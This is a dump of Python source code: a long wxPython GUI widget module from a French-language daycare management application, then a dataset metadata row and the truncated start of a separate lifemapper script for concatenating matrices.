wx.GenericDatePickerCtrl.SetValue(self, date)
def GetValue(self):
date = wx.GenericDatePickerCtrl.GetValue(self)
if date.IsValid():
ymd = map(int, date.FormatISODate().split('-'))
return datetime.date(*ymd)
else:
return None
else:
DATECTRL_WIDTH = 0
class DateCtrl(wx.TextCtrl):
def __init__(self, parent, id=-1, value=None, mois=False, *args, **kwargs):
global DATECTRL_WIDTH
self.mois = mois
wx.TextCtrl.__init__(self, parent, id=-1, *args, **kwargs)
if DATECTRL_WIDTH == 0:
dc = wx.WindowDC(self)
DATECTRL_WIDTH = dc.GetMultiLineTextExtent("00/00/0000 ", self.GetFont())[0]
self.SetMinSize((DATECTRL_WIDTH + 10, -1))
wx.EVT_TEXT(self, -1, self.checkSyntax)
if value is not None:
self.SetValue(value)
def checkSyntax(self, event=None):
str = wx.TextCtrl.GetValue(self)
if str == "":
self.SetBackgroundColour(wx.WHITE)
elif self.mois and (
str.lower() in [m.lower() for m in months] or (str.isdigit() and int(str) in range(1, 13))):
self.SetBackgroundColour(wx.WHITE)
else:
if self.mois:
r = str2date(str, day=1)
else:
r = str2date(str)
if r:
self.SetBackgroundColour(wx.WHITE)
else:
self.SetBackgroundColour(wx.RED)
self.Refresh()
event.Skip()
def GetValue(self):
if self.mois:
return wx.TextCtrl.GetValue(self)
elif wx.TextCtrl.GetValue(self) == "":
return None
else:
return str2date(wx.TextCtrl.GetValue(self))
def SetValue(self, value):
if value is None:
wx.TextCtrl.SetValue(self, '')
elif self.mois:
wx.TextCtrl.SetValue(self, value)
else:
wx.TextCtrl.SetValue(self, '%.02d/%.02d/%.04d' % (value.day, value.month, value.year))
self.Refresh()
class TimeCtrl(wx.lib.masked.TimeCtrl):
def __init__(self, parent):
self.spin = wx.SpinButton(parent, -1, wx.DefaultPosition, (-1, 10), wx.SP_VERTICAL)
self.spin.SetRange(-100000, +100000)
self.spin.SetValue(0)
wx.lib.masked.TimeCtrl.__init__(self, parent, id=-1, fmt24hr=True, display_seconds=False, spinButton=self.spin)
def SetParameters(self, **kwargs):
"""
Function providing access to the parameters governing TimeCtrl display and bounds.
"""
maskededit_kwargs = {}
reset_format = False
if kwargs.has_key('display_seconds'):
kwargs['displaySeconds'] = kwargs['display_seconds']
del kwargs['display_seconds']
if kwargs.has_key('format') and kwargs.has_key('displaySeconds'):
del kwargs['displaySeconds'] # always apply format if specified
# assign keyword args as appropriate:
for key, param_value in kwargs.items():
if key not in TimeCtrl.valid_ctrl_params.keys():
raise AttributeError('invalid keyword argument "%s"' % key)
if key == 'format':
wxdt = wx.DateTimeFromDMY(1, 0, 1970)
try:
if wxdt.Format('%p') != 'AM':
require24hr = True
else:
require24hr = False
except:
require24hr = True
# handle both local or generic 'maskededit' autoformat codes:
if param_value == 'HHMMSS' or param_value == 'TIMEHHMMSS':
self.__displaySeconds = True
self.__fmt24hr = False
elif param_value == 'HHMM' or param_value == 'TIMEHHMM':
self.__displaySeconds = False
self.__fmt24hr = False
elif param_value == '24HHMMSS' or param_value == '24HRTIMEHHMMSS':
self.__displaySeconds = True
self.__fmt24hr = True
elif param_value == '24HHMM' or param_value == '24HRTIMEHHMM':
self.__displaySeconds = False
self.__fmt24hr = True
else:
raise AttributeError('"%s" is not a valid format' % param_value)
if require24hr and not self.__fmt24hr:
raise AttributeError('"%s" is an unsupported time format for the current locale' % param_value)
reset_format = True
elif key in ("displaySeconds", "display_seconds") and not kwargs.has_key('format'):
self.__displaySeconds = param_value
reset_format = True
elif key == "min":
min = param_value
elif key == "max":
max = param_value
elif key == "limited":
limited = param_value
elif key == "useFixedWidthFont":
maskededit_kwargs[key] = param_value
elif key == "oob_color":
maskededit_kwargs['invalidBackgroundColor'] = param_value
if reset_format:
if self.__fmt24hr:
if self.__displaySeconds:
maskededit_kwargs['autoformat'] = '24HRTIMEHHMMSS'
else:
maskededit_kwargs['autoformat'] = '24HRTIMEHHMM'
# Set hour field to zero-pad, right-insert, require explicit field change,
# select entire field on entry, and require a resultant valid entry
# to allow character entry:
hourfield = Field(formatcodes='0r<SV', validRegex='0\d|1\d|2[0123]', validRequired=True)
else:
if self.__displaySeconds:
maskededit_kwargs['autoformat'] = 'TIMEHHMMSS'
else:
maskededit_kwargs['autoformat'] = 'TIMEHHMM'
# Set hour field to allow spaces (at start), right-insert,
# require explicit field change, select entire field on entry,
# and require a resultant valid entry to allow character entry:
hourfield = Field(formatcodes='_0<rSV', validRegex='0[1-9]| [1-9]|1[012]', validRequired=True)
ampmfield = Field(formatcodes='S', emptyInvalid=True, validRequired=True)
# Field 1 is always a zero-padded right-insert minute field,
# similarly configured as above:
minutefield = Field(formatcodes='0r<SV', validRegex='[0-5][0|5]', validRequired=True)
fields = [hourfield, minutefield]
if self.__displaySeconds:
fields.append(copy.copy(minutefield)) # second field has same constraints as field 1
if not self.__fmt24hr:
fields.append(ampmfield)
# set fields argument:
maskededit_kwargs['fields'] = fields
# This allows range validation if set
maskededit_kwargs['validFunc'] = self.IsInBounds
# This allows range limits to affect insertion into control or not
# dynamically without affecting individual field constraint validation
maskededit_kwargs['retainFieldValidation'] = True
if hasattr(self, 'controlInitialized') and self.controlInitialized:
self.SetCtrlParameters(**maskededit_kwargs) # set appropriate parameters
# self.SetBounds("00:00", "23:55")
# Validate initial value and set if appropriate
try:
self.SetBounds(min, max)
self.SetLimited(limited)
self.SetValue(value)
except:
self.SetValue('00:00:00')
return {} # no arguments to return
else:
return maskededit_kwargs
def __IncrementValue(self, key, pos):
text = self.GetValue()
field = self._FindField(pos)
start, end = field._extent
slice = text[start:end]
if key == wx.WXK_UP:
increment = 1
else:
increment = -1
if slice in ('A', 'P'):
if slice == 'A':
newslice = 'P'
elif slice == 'P':
newslice = 'A'
newvalue = text[:start] + newslice + text[end:]
elif field._index == 0:
# adjusting this field is trickier, as its value can affect the
# am/pm setting. So, we use wxDateTime to generate a new value for us:
# (Use a fixed date not subject to DST variations:)
converter = wx.DateTimeFromDMY(1, 0, 1970)
converter.ParseTime(text.strip())
currenthour = converter.GetHour()
newhour = (currenthour + increment) % 24
converter.SetHour(newhour)
newvalue = converter # take advantage of auto-conversion for am/pm in .SetValue()
else: # minute or second field; handled the same way:
increment *= 5
newslice = "%02d" % ((int(slice) + increment) % 60)
newvalue = text[:start] + newslice + text[end:]
try:
self.SetValue(newvalue)
except ValueError: # must not be in bounds:
if not wx.Validator_IsSilent():
wx.Bell()
class AutoMixin:
default = None
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], mask=None):
self.__ontext = True
self.parent = parent
self.fixed_instance = fixed_instance
self.observers = observers
self.mask = mask
if not fixed_instance:
parent.ctrls.append(self)
self.SetInstance(instance, member)
self.Bind(wx.EVT_TEXT, self.onText)
def __del__(self):
if not self.fixed_instance:
self.parent.ctrls.remove(self)
def SetInstance(self, instance, member=None):
self.instance = instance
if member:
self.member = member
self.UpdateContents()
def GetCurrentValue(self):
if self.mask:
return eval('self.instance.%s & self.mask' % self.member)
else:
return eval('self.instance.%s' % self.member)
def UpdateContents(self):
if not self.instance:
self.Disable()
else:
self.__ontext = False
try:
value = self.GetCurrentValue()
self.SetValue(self.default if value is None else value)
except Exception as e:
print("Erreur lors de l'evaluation de self.instance.%s" % self.member, e)
self.__ontext = True
self.Enable(not config.readonly)
def onText(self, event):
obj = event.GetEventObject()
if self.__ontext:
self.AutoChange(obj.GetValue())
event.Skip()
def AutoChange(self, new_value):
old_value = eval('self.instance.%s' % self.member)
if self.mask is not None:
new_value |= old_value & ~self.mask
if old_value != new_value:
last = history.Last()
if last is not None and len(last) == 1 and isinstance(last[-1], Change):
if last[-1].instance is not self.instance or last[-1].member != self.member:
history.Append(Change(self.instance, self.member, old_value))
else:
history.Append(Change(self.instance, self.member, old_value))
exec ('self.instance.%s = new_value' % self.member)
for o in self.observers:
counters[o] += 1
class AutoTextCtrl(wx.TextCtrl, AutoMixin):
default = ""
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
wx.TextCtrl.__init__(self, parent.GetWindow(), -1, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
class AutoComboBox(wx.ComboBox, AutoMixin):
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
wx.ComboBox.__init__(self, parent.GetWindow(), -1, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
class AutoDateCtrl(DateCtrl, AutoMixin):
default = None
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
DateCtrl.__init__(self, parent.GetWindow(), id=-1,
style=wx.DP_DEFAULT | wx.DP_DROPDOWN | wx.DP_SHOWCENTURY | wx.DP_ALLOWNONE, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
# self.Bind(wx.EVT_DATE_CHANGED, self.onText, self)
# DateCtrl.__init__(self, parent, -1, *args, **kwargs)
# AutoMixin.__init__(self, parent, instance, member)
def __del__(self):
AutoMixin.__del__(self)
class AutoTimeCtrl(TimeCtrl, AutoMixin):
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
TimeCtrl.__init__(self, parent)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
self.SetMin("05:00")
def __del__(self):
AutoMixin.__del__(self)
def SetValue(self, value):
if isinstance(value, float):
wx.lib.masked.TimeCtrl.SetValue(self, "%02d:%02d" % (int(value), round((value - int(value)) * 60)))
else:
wx.lib.masked.TimeCtrl.SetValue(self, value)
def onText(self, event):
value = self.GetValue()
try:
self.AutoChange(float(value[:2]) + float(value[3:5]) / 60)
except:
pass
event.Skip()
class AutoNumericCtrl(NumericCtrl, AutoMixin):
default = ""
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
NumericCtrl.__init__(self, parent.GetWindow(), *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
class AutoPhoneCtrl(PhoneCtrl, AutoMixin):
default = ""
def __init__(self, parent, instance, member, fixed_instance=False, observers=[], *args, **kwargs):
PhoneCtrl.__init__(self, parent, -1, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
def __del__(self):
AutoMixin.__del__(self)
if sys.platform == "win32":
class ChoiceWithoutScroll(wx.Choice):
def onMouseWheel(self, event):
pass
def __init__(self, *args, **kwargs):
wx.Choice.__init__(self, *args, **kwargs)
self.Bind(wx.EVT_MOUSEWHEEL, self.onMouseWheel)
else:
ChoiceWithoutScroll = wx.Choice
class ChoiceCtrl(ChoiceWithoutScroll):
def __init__(self, parent, items=None):
ChoiceWithoutScroll.__init__(self, parent, -1)
if items:
self.SetItems(items)
def SetItems(self, items):
ChoiceWithoutScroll.Clear(self)
for item in items:
if isinstance(item, tuple):
self.Append(item[0], item[1])
else:
self.Append(item, item)
def GetValue(self):
selected = self.GetSelection()
return self.GetClientData(selected)
class AutoChoiceCtrl(ChoiceWithoutScroll, AutoMixin):
def __init__(self, parent, instance, member, items=None, fixed_instance=False, observers=[], mask=None, *args, **kwargs):
ChoiceWithoutScroll.__init__(self, parent, -1, *args, **kwargs)
self.values = {}
if items:
self.SetItems(items)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers, mask)
parent.Bind(wx.EVT_CHOICE, self.onChoice, self)
def __del__(self):
AutoMixin.__del__(self)
def Append(self, item, clientData):
index = ChoiceWithoutScroll.Append(self, item, clientData)
self.values[clientData] = index
def onChoice(self, event):
self.AutoChange(event.GetClientData())
event.Skip()
def SetValue(self, value):
if self.GetCurrentValue() != value:
exec ('self.instance.%s = value' % self.member)
self.UpdateContents()
def UpdateContents(self):
if not self.instance:
self.Disable()
else:
value = self.GetCurrentValue()
if value in self.values:
self.SetSelection(self.values[value])
else:
self.SetSelection(-1)
self.Enable(not config.readonly)
def SetItems(self, items):
ChoiceWithoutScroll.Clear(self)
self.values.clear()
for item in items:
if isinstance(item, tuple):
self.Append(item[0] if item[0] else "", item[1])
else:
self.Append(item if item else "", item)
try:
self.UpdateContents()
except:
pass
class AutoCheckBox(wx.CheckBox, AutoMixin):
def __init__(self, parent, instance, member, label="", value=1, fixed_instance=False, observers=[], *args,
**kwargs):
wx.CheckBox.__init__(self, parent, -1, label, *args, **kwargs)
self.value = value
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
parent.Bind(wx.EVT_CHECKBOX, self.EvtCheckbox, self)
def __del__(self):
AutoMixin.__del__(self)
def EvtCheckbox(self, event):
previous_value = eval('self.instance.%s' % self.member)
if event.Checked():
self.AutoChange(previous_value | self.value)
else:
self.AutoChange(previous_value & ~self.value)
def SetValue(self, value):
wx.CheckBox.SetValue(self, value & self.value)
class AutoBinaryChoiceCtrl(ChoiceWithoutScroll, AutoMixin):
def __init__(self, parent, instance, member, items=None, fixed_instance=False, observers=[], *args, **kwargs):
ChoiceWithoutScroll.__init__(self, parent, -1, *args, **kwargs)
self.values = {}
if items:
self.SetItems(items)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
parent.Bind(wx.EVT_CHOICE, self.onChoice, self)
def __del__(self):
AutoMixin.__del__(self)
def Append(self, item, clientData):
index = ChoiceWithoutScroll.Append(self, item, clientData)
self.values[clientData] = index
def onChoice(self, event):
previous_value = eval('self.instance.%s' % self.member)
value = event.GetClientData()
if value:
self.AutoChange(previous_value | self.value)
else:
self.AutoChange(previous_value & ~self.value)
event.Skip()
def SetValue(self, value):
self.UpdateContents()
def UpdateContents(self):
if not self.instance:
self.Disable()
else:
value = eval('self.instance.%s & self.value' % self.member)
if value in self.values:
self.SetSelection(self.values[value])
else:
self.SetSelection(-1)
self.Enable(not config.readonly)
def SetItems(self, items):
ChoiceWithoutScroll.Clear(self)
self.values.clear()
for item, clientData in items:
self.Append(item, clientData)
if clientData:
self.value = clientData
class AutoRadioBox(wx.RadioBox, AutoMixin):
def __init__(self, parent, instance, member, label, choices, fixed_instance=False, observers=[], *args, **kwargs):
wx.RadioBox.__init__(self, parent, -1, label=label, choices=choices, *args, **kwargs)
AutoMixin.__init__(self, parent, instance, member, fixed_instance, observers)
parent.Bind(wx.EVT_RADIOBOX, self.EvtRadiobox, self)
def __del__(self):
AutoMixin.__del__(self)
def EvtRadiobox(self, event):
self.AutoChange(event.GetInt())
def SetValue(self, value):
self.SetSelection(value)
class DatePickerCtrl(wx.DatePickerCtrl):
_GetValue = wx.DatePickerCtrl.GetValue
_SetValue = wx.DatePickerCtrl.SetValue
def GetValue(self):
if self._GetValue().IsValid():
return datetime.date(self._GetValue().GetYear(), self._GetValue().GetMonth() + 1, self._GetValue().GetDay())
else:
return None
def SetValue(self, dt):
if dt is None:
self._SetValue(wx.DateTime())
else:
self._SetValue(wx.DateTimeFromDMY(dt.day, dt.month - 1, dt.year))
class TextDialog(wx.Dialog):
def __init__(self, parent, titre, text):
wx.Dialog.__init__(self, parent, -1, titre, wx.DefaultPosition, wx.DefaultSize)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.textctrl = wx.TextCtrl(self, -1, text, style=wx.TAB_TRAVERSAL | wx.TE_PROCESS_ENTER)
self.Bind(wx.EVT_TEXT_ENTER, self.OnEnter, self.textctrl)
self.sizer.Add(self.textctrl, 0, wx.EXPAND | wx.ALL, 5)
self.btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
self.btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
self.btnsizer.AddButton(btn)
self.btnsizer.Realize()
self.sizer.Add(self.btnsizer, 0, wx.ALL, 5)
self.SetSizer(self.sizer)
self.sizer.Fit(self)
def GetText(self):
return self.textctrl.GetValue()
def OnEnter(self, _):
self.EndModal(wx.ID_OK)
class PeriodeDialog(wx.Dialog):
def __init__(self, parent, periode):
wx.Dialog.__init__(self, parent, -1, "Modifier une période", wx.DefaultPosition, wx.DefaultSize)
self.periode = periode
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.fields_sizer = wx.FlexGridSizer(0, 2, 5, 10)
self.fields_sizer.AddGrowableCol(1, 1)
self.debut_ctrl = DateCtrl(self)
self.debut_ctrl.SetValue(periode.debut)
self.fields_sizer.AddMany(
[(wx.StaticText(self, -1, "Début :"), 0, wx.ALIGN_CENTRE_VERTICAL | wx.ALL - wx.BOTTOM, 5),
(self.debut_ctrl, 0, wx.EXPAND | wx.ALIGN_CENTRE_VERTICAL | wx.ALL - wx.BOTTOM, 5)])
self.fin_ctrl = DateCtrl(self)
self.fin_ctrl.SetValue(periode.fin)
self.fields_sizer.AddMany([(wx.StaticText(self, -1, "Fin :"), 0, wx.ALIGN_CENTRE_VERTICAL | wx.ALL, 5),
(self.fin_ctrl, 0, wx.EXPAND | wx.ALIGN_CENTRE_VERTICAL | wx.ALL, 5)])
self.sizer.Add(self.fields_sizer, 0, wx.EXPAND | wx.ALL, 5)
self.btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
self.btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
self.btnsizer.AddButton(btn)
self.btnsizer.Realize()
self.sizer.Add(self.btnsizer, 0, wx.ALL, 5)
self.SetSizer(self.sizer)
self.sizer.Fit(self)
if sys.platform == "darwin":
SIMPLE_BUTTONS_SIZE = (30, 30)
else:
SIMPLE_BUTTONS_SIZE = (-1, -1)
class PeriodeChoice(wx.BoxSizer):
def __init__(self, parent, constructor, default=None, onModify=None):
wx.BoxSizer.__init__(self, wx.HORIZONTAL)
self.parent = parent
self.constructor = constructor
self.onModify = onModify # TODO rather raise events
self.defaultPeriode = default
self.instance = None
self.readonly = False
self.periodechoice = wx.Choice(parent, size=(220, -1))
parent.Bind(wx.EVT_CHOICE, self.EvtPeriodeChoice, self.periodechoice)
delbmp = wx.Bitmap(GetBitmapFile("remove.png"), wx.BITMAP_TYPE_PNG)
plusbmp = wx.Bitmap(GetBitmapFile("plus.png"), wx.BITMAP_TYPE_PNG)
settingsbmp = wx.Bitmap(GetBitmapFile("settings.png"), wx.BITMAP_TYPE_PNG)
self.periodeaddbutton = wx.BitmapButton(parent, -1, plusbmp, size=SIMPLE_BUTTONS_SIZE)
self.periodeaddbutton.SetToolTipString("Ajouter une période")
self.periodedelbutton = wx.BitmapButton(parent, -1, delbmp, size=SIMPLE_BUTTONS_SIZE)
self.periodedelbutton.SetToolTipString("Supprimer la période")
self.periodesettingsbutton = wx.BitmapButton(parent, -1, settingsbmp, size=SIMPLE_BUTTONS_SIZE)
self.periodesettingsbutton.SetToolTipString("Modifier la période")
self.Add(self.periodechoice, 1, wx.EXPAND | wx.LEFT, 5)
self.Add(self.periodeaddbutton, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.RIGHT, 5)
self.Add(self.periodedelbutton, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT, 5)
self.Add(self.periodesettingsbutton, 0, wx.ALIGN_CENTER_VERTICAL)
parent.Bind(wx.EVT_BUTTON, self.EvtPeriodeAddButton, self.periodeaddbutton)
parent.Bind(wx.EVT_BUTTON, self.EvtPeriodeDelButton, self.periodedelbutton)
parent.Bind(wx.EVT_BUTTON, self.EvtPeriodeSettingsButton, self.periodesettingsbutton)
parent.periodechoice = self
def SetInstance(self, instance, periode=None):
self.instance = instance
self.periode = periode
if instance is not None:
self.periodechoice.Clear()
for item in instance:
self.periodechoice.Append(GetPeriodeString(item))
self.Enable()
if periode is not None:
self.periodechoice.SetSelection(periode)
else:
self.Disable()
def EvtPeriodeChoice(self, evt):
ctrl = evt.GetEventObject()
self.periode = ctrl.GetSelection()
self.parent.SetPeriode(self.periode)
self.Enable()
def EvtPeriodeAddButton(self, _):
self.periode = len(self.instance)
new_periode = self.constructor(self.parent)
if len(self.instance) > 0:
last_periode = self.instance[-1]
new_periode.debut = last_periode.fin + datetime.timedelta(1)
if last_periode.debut.day == new_periode.debut.day and last_periode.debut.month == new_periode.debut.month:
new_periode.fin = datetime.date(
last_periode.fin.year + new_periode.debut.year - last_periode.debut.year, last_periode.fin.month,
last_periode.fin.day)
elif self.defaultPeriode:
new_periode.debut = datetime.date(self.defaultPeriode, 1, 1)
new_periode.fin = datetime.date(self.defaultPeriode, 12, 31)
self.instance.append(new_periode)
self.periodechoice.Append(GetPeriodeString(new_periode))
self.periodechoice.SetSelection(self.periode)
self.parent.SetPeriode(self.periode)
history.Append(Delete(self.instance, -1))
self.Enable()
def EvtPeriodeDelButton(self, evt):
dlg = wx.MessageDialog(self.parent,
"Cette période va être supprimée, confirmer ?",
"Confirmation",
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_EXCLAMATION)
if dlg.ShowModal() == wx.ID_YES:
index = self.periodechoice.GetSelection()
periode = self.instance[index]
history.Append(Insert(self.instance, index, periode))
del self.instance[index]
self.periodechoice.Delete(index)
self.periode = len(self.instance) - 1
self.periodechoice.SetSelection(self.periode)
self.parent.SetPeriode(self.periode)
self.Enable()
def EvtPeriodeSettingsButton(self, _):
periode = self.instance[self.periode]
dlg = PeriodeDialog(self.parent, periode)
response = dlg.ShowModal()
dlg.Destroy()
if response == wx.ID_OK:
history.Append([Change(periode, "debut", periode.debut), Change(periode, "fin", periode.fin)])
periode.debut, periode.fin = dlg.debut_ctrl.GetValue(), dlg.fin_ctrl.GetValue()
if self.onModify:
self.onModify()
self.periodechoice.SetString(self.periode, GetPeriodeString(periode))
self.periodechoice.SetSelection(self.periode)
self.Enable()
def set_readonly(self, readonly):
self.readonly = readonly
def Enable(self, enable=True):
self.periodechoice.Enable(enable and len(self.instance) > 0)
self.periodesettingsbutton.Enable(enable and len(self.instance) > 0 and not config.readonly and not self.readonly)
self.periodeaddbutton.Enable(enable and self.instance is not None and (len(self.instance) == 0 or self.instance[-1].fin is not None) and not config.readonly and not self.readonly)
self.periodedelbutton.Enable(enable and self.instance is not None and len(self.instance) > 0 and not config.readonly and not self.readonly)
def Disable(self):
self.Enable(False)
class ControlsGroup(object):
def __init__(self, parent):
self.ctrls = []
self.parent = parent
self.window = None
def UpdateContents(self):
for ctrl in self.ctrls:
ctrl.UpdateContents()
def GetWindow(self):
return self.parent
class AutoTab(wx.lib.scrolledpanel.ScrolledPanel, ControlsGroup):
def __init__(self, parent):
ControlsGroup.__init__(self, parent)
wx.lib.scrolledpanel.ScrolledPanel.__init__(self, parent)
self.window = self
self.SetAutoLayout(1)
self.SetupScrolling()
def GetWindow(self):
return self
class PeriodeMixin(object):
def __init__(self, member):
self.instance = None
self.member = member
self.periode = None
self.current_periode = None
self.ctrls = []
self.periodechoice = None
def UpdateContents(self):
for ctrl in self.ctrls:
ctrl.UpdateContents()
def SetInstance(self, instance, periode=None):
self.instance = instance
self.periode = periode
if instance:
periodes = eval("instance.%s" % self.member)
if len(periodes) > 0:
if periode is None:
self.periode = len(periodes) - 1
if self.periodechoice:
self.periodechoice.SetInstance(periodes, self.periode)
self.current_periode = periodes[self.periode]
else:
self.current_periode = None
if self.periodechoice:
self.periodechoice.SetInstance(periodes)
for ctrl in self.ctrls:
ctrl.SetInstance(self.current_periode)
else:
self.current_periode = None
if self.periodechoice:
self.periodechoice.SetInstance(None)
for ctrl in self.ctrls:
ctrl.SetInstance(None)
def SetPeriode(self, periode):
self.SetInstance(self.instance, periode)
class PeriodePanel(wx.Panel, PeriodeMixin):
def __init__(self, parent, member, *args, **kwargs):
wx.Panel.__init__(self, parent, -1, *args, **kwargs)
PeriodeMixin.__init__(self, member)
parent.ctrls.append(self)
def GetWindow(self):
return self
class HashComboBox(wx.combo.OwnerDrawnComboBox):
def __init__(self, parent, id=-1):
wx.combo.OwnerDrawnComboBox.__init__(self, parent, id, style=wx.CB_READONLY, size=(150, -1))
def OnDrawItem(self, dc, rect, item, flags):
if item == wx.NOT_FOUND:
return
rr = wx.Rect(*rect) # make a copy
rr.Deflate(3, 5)
data = self.GetClientData(item)
if isinstance(data, tuple):
r, g, b, t, s = data
else:
r, g, b, t, s = data.couleur
dc = wx.GCDC(dc)
dc.SetPen(wx.Pen(wx.Colour(r, g, b)))
dc.SetBrush(wx.Brush(wx.Colour(r, g, b, t), s))
dc.DrawRoundedRectangleRect(wx.Rect(rr.x, rr.y - 3, rr.width, rr.height + 6), 3)
if flags & wx.combo.ODCB_PAINTING_CONTROL:
rr.y -= 2
dc.DrawText(self.GetString(item), rr.x + 10, rr.y - 1)
def OnMeasureItem(self, item):
return 24
def OnDrawBackground(self, dc, rect, item, flags):
if flags & wx.combo.ODCB_PAINTING_SELECTED:
bgCol = wx.Colour(160, 160, 160)
dc.SetBrush(wx.Brush(bgCol))
dc.SetPen(wx.Pen(bgCol))
dc.DrawRectangleRect(rect);
class ActivityComboBox(HashComboBox):
def __init__(self, parent, id=-1):
HashComboBox.__init__(self, parent, id)
self.Bind(wx.EVT_COMBOBOX, self.onChangeActivity, self)
self.activity = None
def SetSelection(self, item):
wx.combo.OwnerDrawnComboBox.SetSelection(self, item)
self.activity = self.GetClientData(item)
def onChangeActivity(self, evt):
self.activity = self.GetClientData(self.GetSelection())
evt.Skip()
def add_activity(self, activity):
self.Append(activity.label if activity.label else "", activity)
def Update(self):
selected = 0
self.Clear()
self.add_activity(database.creche.states[0])
if database.creche.has_activites_avec_horaires():
self.Show(True)
for activity in database.creche.activites:
if activity.has_horaires():
if self.activity == activity:
selected = self.GetCount()
self.add_activity(activity)
else:
self.Show(False)
self.SetSelection(selected)
def GetPictoBitmap(index, size=64):
if isinstance(index, int):
index = chr(ord('a') + index)
bitmap = wx.Bitmap(GetBitmapFile("pictos/%s.png" % index), wx.BITMAP_TYPE_PNG)
image = wx.ImageFromBitmap(bitmap)
image = image.Scale(size, size, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(image)
class CombinaisonDialog(wx.Dialog):
def __init__(self, parent):
wx.Dialog.__init__(self, parent, -1, "Nouvelle combinaison", wx.DefaultPosition, wx.DefaultSize)
self.sizer = wx.BoxSizer(wx.VERTICAL)
gridSizer = wx.FlexGridSizer(5, 4, 5, 5)
self.combinaison = []
for i in range(20):
picto = wx.BitmapButton(self, -1, GetPictoBitmap(i), style=wx.BU_EXACTFIT)
picto.picto = chr(ord('a') + i)
self.Bind(wx.EVT_BUTTON, self.OnPressPicto, picto)
gridSizer.Add(picto)
self.sizer.Add(gridSizer, 0, wx.EXPAND | wx.ALL, 5)
self.combinaisonPanel = wx.Panel(self, style=wx.SUNKEN_BORDER)
self.combinaisonPanel.SetMinSize((-1, 36))
self.combinaisonSizer = wx.BoxSizer(wx.HORIZONTAL)
self.combinaisonPanel.SetSizer(self.combinaisonSizer)
self.sizer.Add(self.combinaisonPanel, 0, wx.EXPAND)
btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.sizer.Add(btnsizer, 0, wx.ALL, 5)
self.SetSizer(self.sizer)
self.sizer.Fit(self)
def OnPressPicto(self, event):
sender = event.GetEventObject()
picto = sender.picto
self.combinaison.append(picto)
bmp = GetPictoBitmap(picto, size=32)
button = wx.StaticBitmap(self.combinaisonPanel, -1, bmp)
self.combinaisonSizer.Add(button, 0, wx.LEFT, 5)
self.combinaisonSizer.Layout()
def GetCombinaison(self):
return "".join(self.combinaison)
class TabletteSizer(wx.StaticBoxSizer):
def __init__(self, parent, object):
wx.StaticBoxSizer.__init__(self, wx.StaticBox(parent, -1, u'Tablette'), wx.VERTICAL)
self.parent = parent
self.object = object
internalSizer = wx.BoxSizer(wx.HORIZONTAL)
self.combinaisonSizer = wx.BoxSizer(wx.HORIZONTAL)
internalSizer.Add(self.combinaisonSizer)
settingsbmp = wx.Bitmap(GetBitmapFile("settings.png"), wx.BITMAP_TYPE_PNG)
self.button = wx.BitmapButton(parent, -1, settingsbmp)
self.button.Enable(not config.readonly)
parent.Bind(wx.EVT_BUTTON, self.OnModifyCombinaison, self.button)
internalSizer.Add(self.button, 0, wx.LEFT, 10)
self.Add(internalSizer, 0, wx.TOP | wx.BOTTOM, 10)
def OnModifyCombinaison(self, _):
dlg = CombinaisonDialog(self.parent)
res = dlg.ShowModal()
if res == wx.ID_OK:
self.object.combinaison = dlg.GetCombinaison()
self.UpdateCombinaison()
history.Append(None)
dlg.Destroy()
def UpdateCombinaison(self):
self.combinaisonSizer.DeleteWindows()
if self.object:
self.button.Enable(not config.readonly)
if self.object.combinaison:
for letter in self.object.combinaison:
bitmap = GetPictoBitmap(letter, size=32)
picto = wx.StaticBitmap(self.parent, -1, bitmap)
self.combinaisonSizer.Add(picto, 0, wx.LEFT, 10)
else:
self.button.Disable()
self.combinaisonSizer.Layout()
self.parent.sizer.Layout()
def SetObject(self, object):
self.object = object
if sys.platform == "darwin":
MACOS_MARGIN = 1
else:
MACOS_MARGIN = 0
| gpl-3.0 | -3,867,315,662,280,360,400 | 36.072874 | 187 | 0.582789 | false | 3.746727 | false | false | false |
lifemapper/core | LmCompute/tools/common/concatenate_matrices.py | 1 | 1246 | # !/bin/bash
"""This script concatenates two (or more) matrices along a specified axis
"""
import argparse
from LmBackend.common.lmobj import LMObject
from lmpy import Matrix
# .............................................................................
def main():
"""Main method of the script
"""
# Set up the argument parser
parser = argparse.ArgumentParser(
description='Concatenate two (or more) matrices along an axis')
parser.add_argument(
'out_fn', type=str,
help='The file location to write the resulting matrix')
parser.add_argument(
'axis', type=int,
help='The (Matrix) axis to concatenate these matrices on')
parser.add_argument(
'mtx_fn', type=str, nargs='*',
help="The file location of the first matrix")
args = parser.parse_args()
mtxs = []
if args.mtx_fn:
for mtx_fn in args.mtx_fn:
